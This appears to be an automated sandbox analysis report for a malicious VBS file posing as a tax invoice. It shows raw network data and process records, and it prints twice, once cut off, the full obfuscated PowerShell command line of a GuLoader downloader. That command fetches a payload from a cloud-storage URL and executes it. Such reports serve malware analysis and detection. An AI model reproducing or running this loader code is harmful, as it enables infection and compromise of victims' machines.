                                              2024-09-30 07:58:05 UTC4861INData Raw: 38 26 9e 38 23 9b 69 53 65 ac 42 c4 26 dc 4d 56 28 d0 40 3b 6b 18 c9 ac 86 5b 47 9e 7e fc 3c 14 24 8d 94 dd 2e 54 67 97 f4 2b 43 1a 37 d5 f4 5f 1f 52 9b 02 28 2e ff b6 f2 ae a0 45 07 a1 73 62 05 f0 9d 27 54 2e f6 8d 9b 01 cc 4f c6 5f 39 b0 46 31 c1 49 8a 62 a4 3a 18 5f 3b 9b 87 7c c7 12 ff 71 af cf 86 5d c7 51 35 59 96 78 1d ca b6 7e 5c 76 45 db b9 09 3e 72 06 f0 f7 5c 77 1b 39 f8 50 67 88 43 aa 90 d2 43 0d 2b 74 03 54 b7 09 6e 67 52 b8 5e de 7b 76 98 91 4c db 99 71 d2 53 3f eb 8f 95 d6 9e 58 44 23 c7 59 a1 43 8e af 5d 0b 6f db 36 76 57 d6 0f 17 0f 3a 77 a6 0e 42 0b 99 26 66 c9 8c 26 59 5d 62 f2 07 2a bf 9e 38 1d d6 ff ed 6b c2 18 a4 31 10 45 79 f9 6d 77 5b d7 e7 ad 39 9a f9 3e 76 c5 8c 3a 76 4c fd 4d 3f a0 41 70 f6 e3 a6 ca 27 45 47 59 ac 90 2f 98 6d e5
                                              Data Ascii: 8&8#iSeB&MV(@;k[G~<$.Tg+C7_R(.Esb'T.O_9F1Ib:_;|q]Q5Yx~\vE>r\w9PgCC+tTngR^{vLqS?XD#YC]o6vW:wB&f&Y]b*8k1Eymw[9>v:vLM?Ap'EGY/m
                                              2024-09-30 07:58:05 UTC117INData Raw: aa 70 ec f0 64 7e c3 12 0d c8 e3 91 eb 6d 16 30 fb e6 b0 dd ed 48 52 ec 75 72 8a 60 83 13 ab 54 c0 1b 6d 9e fa 8d 7c ef 0b 44 a2 f4 1b c3 ba 0b 3a c3 bc 13 9f 45 8c 53 e7 8f d4 39 b3 0c c9 a2 57 96 5f bd ce 4a 57 13 be e2 cc 22 15 3c f2 f3 68 1b e8 33 d9 93 40 b2 85 ae a2 54 4a 57 ef a0 72 c7 b7 5b f1 14 f2 05 b2 f1 16 54 b4 db 9d cf f6 ed 15 93 cc
                                              Data Ascii: pd~m0HRur`Tm|D:ES9W_JW"<h3@TJWr[T
                                              2024-09-30 07:58:05 UTC1322INData Raw: eb ae 37 94 78 99 6b 7d 28 97 9b a4 73 cd d6 02 2f 47 6b 95 be f0 64 33 eb e2 57 e6 28 85 07 4b 91 33 08 e4 93 ec fd 7a b3 60 b0 7e 6a 90 24 23 39 50 c5 46 85 18 25 aa a1 9e a9 9c b5 9f bc 80 a5 e8 18 4c 57 37 2c 8f 15 3e 84 73 7e c8 88 41 fd df f4 9c 85 b5 ba b9 d1 bf 92 25 d2 59 5a 76 d1 c2 71 31 41 57 9f ea 78 e8 a8 fc 98 2a aa 46 ec 61 f8 8d fe 4d 68 bf c9 99 89 fc b0 aa 9a 9a d3 51 2c f6 a4 71 74 ee 04 0b ee 04 9f 80 df bb 8c 3c 51 ad da ea 49 5e 99 41 33 d8 46 b5 71 b5 f8 55 c5 45 dc f0 2e ef 3d 00 d0 7c 01 9d 45 fa 24 88 70 d1 88 77 ec 24 90 41 33 17 60 4e 7d 32 14 33 e0 be fb 1e ac fb 98 68 4e c2 3e 99 0d 33 c6 d1 87 31 60 ce b1 41 db d4 1e 79 17 33 fb 9f db 70 60 78 e9 7c 99 09 38 68 bd 9e 3e 74 79 e8 df 05 91 fa 07 d2 10 05 92 dc 60 88 f4 a4 c9
                                              Data Ascii: 7xk}(s/Gkd3W(K3z`~j$#9PF%LW7,>s~A%YZvq1AWx*FaMhQ,qt<QI^A3FqUE.=|E$pw$A3`N}23hN>31`Ay3p`x|8h>ty`
                                              2024-09-30 07:58:05 UTC1390INData Raw: c5 06 d8 96 c7 8a 3e 80 e0 92 3d 86 14 e6 c1 a3 95 99 0c 00 1c 05 a6 22 99 9f 57 98 ec a0 69 15 4e f8 53 49 55 7f 9c 51 2e 76 f3 ca 7c 0b 8d 03 97 51 24 d3 7b c3 2f b2 b5 74 bf 39 af b4 2e d4 e7 08 9a 55 63 01 59 bb e4 a3 10 e7 56 fc 16 c5 91 1c 7e 48 a7 06 6d 34 cb 58 09 c6 dc c2 ab 90 70 5b d1 83 f5 54 73 f8 4b 79 4e 61 0a 11 0b a4 81 ec 6d 5e 1c e0 79 a0 71 68 bc 63 55 12 08 76 69 24 a5 6e 02 9e 85 d9 48 e6 dc d7 ea 52 9a 8c ce 0c 87 7a b9 98 ae 19 16 69 bb 2a ca d8 02 5b dc a9 e1 fd ea f7 cb 20 e0 f0 bc 1c 21 ff 8b 14 36 cf f1 3d 38 8b 9f ca b4 d6 90 c5 a2 0d 5b b2 65 51 12 85 27 9b f8 f1 ad 14 34 83 98 15 11 aa c0 01 2a 5e fe c5 11 56 ca d4 3f ac 99 9d 64 d2 0b d8 8b 8e e1 f0 59 51 3b 66 3f e1 3b f8 f5 9f e7 b7 05 2e b4 61 04 a3 1a e8 89 8a 8c 5c d4
                                              Data Ascii: >="WiNSIUQ.v|Q${/t9.UcYV~Hm4Xp[TsKyNam^yqhcUvi$nHRzi*[ !6=8[eQ'4*^V?dYQ;f?;.a\
                                              2024-09-30 07:58:05 UTC1390INData Raw: e9 b3 fc d0 71 aa 13 ee d4 09 99 05 a1 e8 0f 64 11 a0 ac 61 63 94 b5 ba 22 7f 25 49 d4 29 2d a7 ed 04 f4 e9 ba ad 13 d7 9f 90 8b 29 c2 ad 4f ab ce 90 84 9f c3 01 d9 0b 7e be e3 7e 70 0d ce 18 85 54 61 29 a7 1b ae 6d b4 d2 12 b2 17 4e 6b 10 5d f3 51 1c 7d a5 fe 14 1a 24 3c 0a 3e 52 7c 5e 28 58 d9 a4 2a e5 12 a9 45 a0 0a c7 a1 5c f5 20 66 53 7e e2 41 48 b7 f8 8a f5 20 ec c0 fc af 67 80 09 20 af c3 42 13 ae 05 8c 86 b7 2a ed 10 f6 9f 76 2d 62 63 79 e6 5b 2f 6a c9 3a b8 e0 8a 9b 6f 46 84 59 1f f3 74 c6 04 fd a9 63 ba e4 8d d7 ec 3c d0 42 97 76 b4 43 8c 36 91 21 ea af 45 4b a7 5f b7 fc 4f 25 2f ca 21 35 7c 48 9d 28 f4 cc 13 6d dc 37 1e 82 66 a2 f6 50 f6 9b 14 83 66 6a 04 a5 00 a9 bc f5 90 8b 6d 52 6c 67 b7 51 92 16 af f9 03 4c a2 dc 2b 10 f1 16 7c 21 05 c1 da
                                              Data Ascii: qdac"%I)-)O~~pTa)mNk]Q}$<>R|^(X*E\ fS~AH g B*v-bcy[/j:oFYtc<BvC6!EK_O%/!5|H(m7fPfjmRlgQL+|!
                                              2024-09-30 07:58:05 UTC1390INData Raw: e8 47 05 aa 45 51 9a f8 f9 ed e3 3e 55 57 44 3a 0e ba 89 02 a7 2c be ac 4e 51 05 e6 59 01 6f 0e c5 d0 1e 97 64 fe 64 78 91 e5 b5 ab 30 1a 69 05 2b 34 e4 3a 97 4e 9c 6a 3e c9 9b cc 2a 32 14 bd ea 06 24 13 a3 88 b4 a4 eb ca 2a 80 4d 1b 28 f5 c8 d5 f6 21 cd 92 07 b7 36 fa 3f 36 5a c1 a0 6e 55 5a c1 9e 32 4b 3a 7e f2 03 2a 83 1f ea 7c 8a 79 2f f8 59 7a 6b 0e 49 80 fc 47 33 ec 1a de 05 af f4 2a 60 e3 86 8c 86 16 99 69 7a 62 1c fb 60 36 1a b6 73 b1 89 31 db da 74 49 38 40 99 ca 00 07 a3 f0 3f 33 a7 c0 4b 28 c7 6f 9a f9 3e 76 a6 db d6 eb a9 c0 b6 c0 3d f3 7a 7d 2d 24 54 a8 ba 47 a6 4e c2 05 af 6b b3 09 38 98 61 c7 3c c4 4a 2a d8 43 f7 1c 25 9c fa dd 85 0a 94 89 0f df 01 07 0b f4 e3 a0 2f bf b3 c0 2f e3 b2 8d 9b 42 d4 22 dd e9 99 8c 7a a5 4e ff 27 3a 91 59 ba 45
                                              Data Ascii: GEQ>UWD:,NQYoddx0i+4:Nj>*2$*M(!6?6ZnUZ2K:~*|y/YzkIG3*`izb`6s1tI8@?3K(o>v=z}-$TGNk8a<J*C%//B"zN':YE
                                              2024-09-30 07:58:05 UTC1390INData Raw: 36 e2 18 ce 5c 87 53 19 73 d6 aa 36 cb 2a 69 9a ee 1e 88 c5 9d a3 35 ee 89 26 89 fc 33 4f 9f 0f a2 69 42 b5 6b 2d 22 74 c8 b6 af ca 7e fd bb a4 ee d5 57 cb 82 44 59 7a 05 39 ea cc 74 dd 93 be e7 ed ad 0e 95 de d9 eb ea c6 c5 67 be 3c 15 d2 97 65 3e b5 79 71 5b c9 cb 70 b1 8f b3 2b 83 ab 9d fd 8f 6a 54 ca b1 27 a6 54 1f 08 50 db c3 39 cd 85 b7 a0 48 48 df a6 9d 30 1e ad 3b e0 60 d7 a8 f2 9c b4 24 7a e5 f0 c7 9a 73 17 90 cb 6e 9a 7e a5 fc a7 05 6d 90 d9 f7 57 e1 03 5e 37 65 e7 8b aa 6e 6e 89 36 f0 13 50 94 6f 93 23 40 01 46 a1 95 dc 83 c0 e4 5e 54 82 9f b5 65 48 32 91 c4 7f 14 f3 84 c4 5c 7f 8a bd 8a 9f 59 2e c1 32 98 03 52 95 7d 73 3a a7 62 28 4c e7 a6 dd f7 1e c8 85 17 99 7e 7b dc 3e b9 21 b6 a6 1a 76 1a 63 a8 68 3d d4 05 fd c8 a9 53 8a 1d bd a4 db 33 80
                                              Data Ascii: 6\Ss6*i5&3OiBk-"t~WDYz9tg<e>yq[p+jT'TP9HH0;`$zsn~mW^7enn6Po#@F^TeH2\Y.2R}s:b(L~{>!vch=S3
                                              2024-09-30 07:58:05 UTC1390INData Raw: a2 74 6c cd d3 86 0c 8c ad bf 62 0a 51 64 f4 33 91 2e fd fb ca cb 20 68 79 b3 cc 23 7f dc 38 64 15 1d 53 1c 7b 19 56 90 ca 93 6c 0d 1a 24 48 c2 23 d5 65 13 43 c8 d5 61 61 4b b2 8f 59 76 19 1b 1e 86 f1 30 6a 06 05 5b 0f f0 c7 25 43 10 e3 a1 44 b5 6b 93 4b 22 ee 97 3b 31 37 b5 cc d1 fc 07 ab af 21 1b 13 84 d4 50 57 87 58 f8 52 b1 9f e7 f5 97 46 0f ca 6d ee d9 4d 4c b7 9a 46 d4 c9 d8 e6 a8 2f 47 a4 71 dc 92 3a 03 ae df f1 ba 8e 93 08 1a 63 5f b4 77 72 79 b1 84 2e fb 1d 74 63 19 32 d0 9b ab 6c be af 5d ba 81 dd 2e d3 1b d1 65 7f b4 9e c6 5f e7 c5 3c 54 ba a7 41 cb 5c 52 84 24 66 1a 8f a2 41 e5 87 0c db 48 9b 95 ff 90 9b 6d 50 15 ac dd ec b3 14 57 83 0a ea 82 bd 45 bd 7b ab c6 a2 0d 1a b6 94 22 30 b6 c1 6a 6f 09 1f db 6f b4 ce fb 8b 8d 0f f0 83 18 e3 b3 f8 cc
                                              Data Ascii: tlbQd3. hy#8dS{Vl$H#eCaaKYv0j[%CDkK";17!PWXRFmMLF/Gq:c_wry.tc2l].e_<TA\R$fAHmPWE{"0joo
                                              2024-09-30 07:58:05 UTC1390INData Raw: f3 3a 75 0c 48 9d 10 17 58 12 4d 5f db af 2d 68 e8 92 9d 19 87 45 c4 ba c7 19 4f ba 18 22 a1 9b 5f 87 dd 80 4f db e0 57 21 df 35 26 21 16 a4 d3 16 84 21 ff 20 a6 81 50 ac b8 e2 fc 0c 7f e1 be e6 47 bf 15 3a ae d0 ed 50 8d 58 a7 a0 f6 6d 67 11 30 27 8c 89 ab 0c aa b8 8f 10 92 19 92 ab 88 f9 03 cc 22 f4 84 55 6a fd d2 a7 12 40 63 98 0a 04 71 bf b7 3e 1a 28 7e cf ce 1c f4 d1 7c 91 56 4c e0 d3 23 86 18 7c 75 1c 7f 4e 4d 28 3d 0d 3a f3 cd 2b 6e da b0 f6 3f 9c df ff fc 26 4b f3 a7 dc 50 7f 71 2d f7 af a8 60 0c 9f ee 56 fb ea bf 38 91 c2 fb fc 39 b3 9e c3 db 22 34 2a 8f 41 e9 b0 f6 b6 82 71 ab 5c d6 eb f5 8b 33 86 0a f7 36 5c 28 8f 00 dc d3 73 31 a2 a9 61 78 42 a0 9e b7 ad cb e1 30 0b 52 f2 6f 5e e2 8a bd 04 61 38 b8 e0 2b 89 12 2d 54 07 db dd bc db 2a f4 db 04
                                              Data Ascii: :uHXM_-hEO"_OW!5&!! PG:PXmg0'"Uj@cq>(~|VL#|uNM(=:+n?&KPq-`V89"4*Aq\36\(s1axB0Ro^a8+-T*


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:03:57:15
                                              Start date:30/09/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs"
                                              Imagebase:0x7ff6f2b40000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:03:57:18
                                              Start date:30/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk erNonneiColletalteryUd,ytPDegrarAnlgsoTilintdefiboP ogrcK.essoDet,clG lfdTWei hyIndh pObjeke.ebuk]Ordd,:Hjest:SubaqTBaglylGelatsRubin1 B,oa2Nerei ');$Dermoid108=$Rekreeredes[0];$Aalb=(Demissioner 'Hellm$ nbegg odralDentioLnsitbDrumrABlindl Picc:CommoMUdsena inden,etrauBoardSV,riae pndeRPteleSZo ch=Syntan BeeseAnatfW Knap-Tang oFremsbE samJLukkeERipplc Utalt Sema RadioS omsYFin,eS CajutGar iET,talm Klum.OsmetNF rskemol atRamni.AeridWClienEGiantB akeeCFnaddl afiriS aineCountNIndgrT urve ');Complimentable ($Aalb);Complimentable (Demissioner 'Unm n$ AandMAprjtaDiscon.igmouRos vsSurgeepolycrKl nisSpi l.NatioH PeaseKolibaProjed imike.lestr ochls Gulp[ semi$ami,aSBesluaMendicY erpcDe,eah.ammea HuserHaymiosuperfInferaParaprSuperi OplinC,priaCigarcSnavseBehagoBa liuCl,nksSalut]S veb=San t$ harCP eroo Fingn Oplav JudaeTaxabcAf ket Laici IntivTonetelactol taily acci ');$Bortkaldenes=Demissioner ' Run $KugleM evea SchonSubtruA tens edbeNoctirV.nstsEremi.UdsorDegenpowheatwToldanDescrlPilotoIsltpaSe.undTeor FSh rpiHajerl.ndlie rais(Sk ll$progrDHypoaeA wesr Ichtm RedioSlgegiBuddhdStor 1Pro u0 Komi8 For ,Supin$KloroTTripii spanl an asSamm.tA likaDisbunFortidSympts AntikL.mfaoCheunn.halat Sew.r Fas,o F,rsl SennlForlaeTabernForsk)Early ';$Tilstandskontrollen=$Taktreguleringsordning;Complimentable (Demissioner ' St.a$SagsbgHeterLLin,aOOverlB Ac,tA MonuLFork :RaaensIps,lEaburacCha,uE.amboS Svi,hYtt oeAu okrHyoep= Khar(SlabutReconedialesS rjtTAccen- SlenPMins A,njurtBuskvHDemor syla$H.nritStil.i DiviL Sel SImpasT orbeAFamleNLa,tidOsteesSlittK CyphO Dec nTilflTColorrFlde oPushelDangllAposteKont Nmetag)Mith ');while (!$Secesher) {Complimentable (Demissioner 'Besho$W ankgToolmlIndenoDingibStjmaa PosslKrmme: BldgLMappegUr.tie skvamS xoliSteepdGadenlUncateLal erDiagrsArbej=S.nka$ReduptReletrPreteuKe.neeRredd ') ;Complimentable $Bortkaldenes;Complimentable (Demissioner 'PositS ConstBaandaA ronrPlummtmax l-RadicSRebuclH,tideNondaeF.odepF rbi Parag4Perki ');Complimentable (Demissioner 'Vates$CentegtokonlT gneoMartibIndkbaRededlC lla:RegniSSt,ike UdskcSmidieForhasHarboh undeeExpatrRetou= Remu(,luviTKonsteRedidsHypert E.ns-FodtuPSpinaaAfgiftAutomhUnwil Skel $ouchiTFedtei Ko.llSoillsLselatGe iraHolden UdbldForsesP lotkFo nuo ba ln Eks t HjerrLarkio RentlKvajplIn uleSpec nF rtl)Age s ') ;Complimentable (Demissioner 'Unvex$UnweagDis elemissoSemipbb odtaSvinglPostd:ThousNMick yDgl nsPlombeMacra= Re r$ Sno.gGrumblUnevao LeucbPartiaRe.mplP ras:C lfoS HalvtlivssmSelvraKo,ypgAarsktLittleChambrDansknPart,e Fr.p+Frems+Balde% luor$OspheRPiggieind rkArecarS bbre For.e.ersurFolloeAmberd usmoeNonres Tndi.ShoemcRew,ro MultuQua,en m,krtFi,eo ') ;$Dermoid108=$Rekreeredes[$Nyse];}$hanerne=327149;$Whitewashes=31726;Complimentable (Demissioner 'Godke$ Mudrg ChanlSklveoAgorabI posaKontalKathi: ArmvTNicksyHel.as BrilkSu syl Cas aRedamn Po gdtorqusexophk BranoHurtirDiapatTovreemalacnKo keeVandf Rente=K,ydr UnmaGOgcoce KonttTelea-v yagC Preeo PennnMur etTrumbeAntipnBour tBog.r .well$S iseTHjtidiKo salBrdtesParcet SkaraMeta nAl ebd innosImprekGymnaounfe.nStanstSomatra,itho GenmlSereal D,caePbelanpentr ');Complimentable (Demissioner 'Helio$fontegRuskvlEul goTr,ldbShmooaAboitlA ive:SkmteAL vitfDataovBridaiunshrsTi,skeLedersUrocy F rgl=Strit Kna,e[D mkiSBjensyElaeosDecrot K,ype B.gsm Defi.An.itCPlejeoRi.honIntervSminkeMet,lrFejlktFrken]Barbo:Symph:BobslFsygepr InduoSkummmUnel BChr saAltersA.reme.asel6Vej n4PresuS anectGli.trNutidicho en Halvg We d(.nder$Nonc T LgdeyT.igosPeltikZoonulTheataResu,nAlarmd DeodsStrudkUforkobasisrDisset UforeM,tronLu,eaeIncon)Blunt ');Complimentable (Demissioner ',iern$UdbldgAf nnl zygoo BespbLave,ashal.lstrue:Pe sohKlbenyRevispTranse Profr LumidMispoeOrdk.l PrstiMallec Grapas.gnecTankeyHausf Bo sa=Garr, Plan[VarmeSandenyAnthrsCherrtS ovbe ChesmBulkl.P.ojeTBalloeT iloxGavltt Rh.x.Wi dbEFermenfljtecAabenom.rryd mneiPodopnDodecg,kole]Sidew:Carbi:UnwebA s apSNieceCDilatIUngtjIStorm.UdfreGDogmaeSyntatSuli.SGla.ftMondorEmbaciSegganApertgRommy(Fruit$ DemoA Car,fSpectvKommuiMicrosForeseAr.easNedto)Be.ud ');Complimentable (Demissioner 'U.ere$ Afskg AvlslUnmanoK rtebElandaClanslPha,t:Poly,EBullisStigmt brikhEx rieBalanshaeani Vej,oVilk,gAnnlirA.equa D gep AfbahAptycyAgerb=Arbit$ KanehLeucoy Loo pEuroceRawbor BuksdCryste vehilMargiiBrnebcunentaMomencDafniyMac.o. eners Fuldu ankebStar sIchortTek tr Solsi ,rcin eohygForby(Elect$CensohTor kaShadfnScapheSlatirBriefnZ,dkueMisap,Mine,$StortWK lethSt rei HachtinteleBlindw InteaStyrbs F,erhBilggeAarsis Stud)Eng n ');Complimentable $Esthesiography;"
                                              Imagebase:0x7ff7be880000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:03:57:18
                                              Start date:30/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:03:57:29
                                              Start date:30/09/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk erNonneiColletalteryUd,ytPDegrarAnlgsoTilintdefiboP ogrcK.essoDet,clG lfdTWei hyIndh pObjeke.ebuk]Ordd,:Hjest:SubaqTBaglylGelatsRubin1 B,oa2Nerei ');$Dermoid108=$Rekreeredes[0];$Aalb=(Demissioner 'Hellm$ nbegg odralDentioLnsitbDrumrABlindl Picc:CommoMUdsena inden,etrauBoardSV,riae pndeRPteleSZo ch=Syntan BeeseAnatfW Knap-Tang oFremsbE samJLukkeERipplc Utalt Sema RadioS omsYFin,eS CajutGar iET,talm Klum.OsmetNF rskemol atRamni.AeridWClienEGiantB akeeCFnaddl afiriS aineCountNIndgrT urve ');Complimentable ($Aalb);Complimentable (Demissioner 'Unm n$ AandMAprjtaDiscon.igmouRos vsSurgeepolycrKl nisSpi l.NatioH PeaseKolibaProjed imike.lestr ochls Gulp[ semi$ami,aSBesluaMendicY erpcDe,eah.ammea HuserHaymiosuperfInferaParaprSuperi OplinC,priaCigarcSnavseBehagoBa liuCl,nksSalut]S veb=San t$ harCP eroo Fingn Oplav JudaeTaxabcAf ket Laici IntivTonetelactol taily acci ');$Bortkaldenes=Demissioner ' Run $KugleM evea SchonSubtruA tens edbeNoctirV.nstsEremi.UdsorDegenpowheatwToldanDescrlPilotoIsltpaSe.undTeor FSh rpiHajerl.ndlie rais(Sk ll$progrDHypoaeA wesr Ichtm RedioSlgegiBuddhdStor 1Pro u0 Komi8 For ,Supin$KloroTTripii spanl an asSamm.tA likaDisbunFortidSympts AntikL.mfaoCheunn.halat Sew.r Fas,o F,rsl SennlForlaeTabernForsk)Early ';$Tilstandskontrollen=$Taktreguleringsordning;Complimentable (Demissioner ' 